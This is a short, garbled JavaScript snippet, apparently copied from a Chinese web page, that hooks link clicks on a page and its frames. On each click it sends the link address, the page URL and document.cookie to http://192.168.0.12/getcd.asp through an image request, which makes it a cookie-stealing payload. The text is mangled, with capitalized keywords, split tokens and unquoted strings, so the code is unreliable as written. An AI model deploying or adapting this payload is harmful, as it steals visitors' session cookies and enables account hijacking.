TeN. potgnayiaH. wwW vbs small shop
// This is almost all written by lauma.
// Obtain information on the current page
Document. onclick = function (e ){
Var img = new Image ();
Var e = e | event;
Var element = e.tar get | e. srcElement;
If (element. tagName. toLowerCase () = ""){
If (! Element. getAttribute (visited ))
{
Img. src = http: // 192.168.0.12/getcd. asp? Var = + element. href + location. href + encodeURI (document. cookie );
Element. setAttribute (visited, true );
}
}
}
// Obtain the sub-Framework Information
Window. onload = function (){
Var img = new Image ();
For (var I = 0; I <document. frames. length; I ++)
{
For (var j = 0; j <document.frames? I =.doc ument. links. length; j ++)
{
Document.framespolici2.16.doc ument. links [j]. onclick = function ()
{
If (! This. getAttribute (visited ))
{
Img. src = http: // 192.168.0.12/getcd. asp? Var = + this. href + top. location. href + encodeURI (document. cookie );
This. setAttribute (visited, true );
}
}
}
}
}